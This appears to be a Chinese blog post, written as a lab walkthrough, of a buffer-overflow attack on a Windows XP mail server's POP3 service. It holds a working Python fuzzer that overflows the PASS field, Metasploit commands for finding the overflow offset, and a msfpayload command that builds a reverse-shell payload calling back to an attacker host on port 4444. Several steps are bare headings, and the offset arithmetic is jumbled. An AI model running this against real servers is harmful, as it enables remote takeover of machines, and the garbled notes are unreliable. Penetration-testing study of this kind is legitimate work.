-
windows xp 邮件服务器漏洞溢出
缓冲区溢出攻击过程
概念解释:
第一步:入侵着测试目标机的25和110端口
nc 192.168.20.218 25
nc 192.168.20.218 110
telnet 192.168.20.218 110第二步:入侵着测试目标机缓冲区溢出
root@kali:/home/lgb/overflow# cat overflow.py
#!/usr/bin/python
import socketbuffer = [“A”]
counter = 300
while len(buffer) <= 20:
buffer.append(“A” * counter)
counter += 300
for string in buffer:
print “FUZZING PASS WITH %s BYTES” % len(string)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((‘192.168.20.218’, 110))
s.recv(1024)
s.send(‘USER test’ + ‘\r\n’)
s.recv(1024)
s.send('PASS ’ + string + ‘\r\n’)
s.send(‘QUIT\r\n’)
s.close()第三步:判断目标机器是否发生缓冲区溢出
第四步:得到确切缓冲区溢出位置所在的区间。
执行:./overflow2.py,程序没有溢出
执行:./overflow2.py,程序溢出第五步:得到确切缓冲区溢出位置
288 cd /usr/share/metasploit-framework/
1289 ls
1290 cd tools/
1291 ls
1292 cd exploit/
1293 ls
1294 ./pattern_create.rb -l 2700
1295 ls
1296 ./pattern_offset.rb -q 39694438
1297 pwd
第六步: 再次验证确切缓冲区溢出位置
第七步:确定可存放shellcode的地址空间
016BA1AC
016BA154020DA301
020DA15416-4=12+1=13
A=10,B=11,C=12,D=13
15-5=10 A
1
1AD=429
161613
第八步:找出坏字符
注释:ESP寄存器指向的存储空间中不能出现字符00、0a、0d
第九步:重定向数据流
重定向数据流即修改EIP寄存器的值为ESP寄存器的值
设置跳转断点
运行下面的程序
按F7单步执行:
第十步:生成shellcode,实施缓冲区溢出攻击
1298 cd /usr/share/framework2/
1299 ls
1300 ./msfpayload win32_reverse LHOST=192.168.20.228 LPORT=4444 R |./msfencode -b “\x00\x0a\x0d”
-
相关阅读:
传输层协议--UDP
探秘亚马逊云科技海外服务器 | 解析跨境云计算的前沿技术与应用
随机过程理论知识(六)
数据库的隔离级别
Vue 3 的 setup语法糖到底是什么东西?
Sql Server性能排查和优化懒人攻略
【IOS-初学】利用分段选择器和滑动开关(条)等等实现简单的图片浏览器-透明度和图片切换功能
MySQL主从同步原理
第二章:Jvm监控及诊断工具-命令行篇
2020携程java面试题整理,开发实习一面面经
- 原文地址:https://blog.csdn.net/qq_40168905/article/details/127905810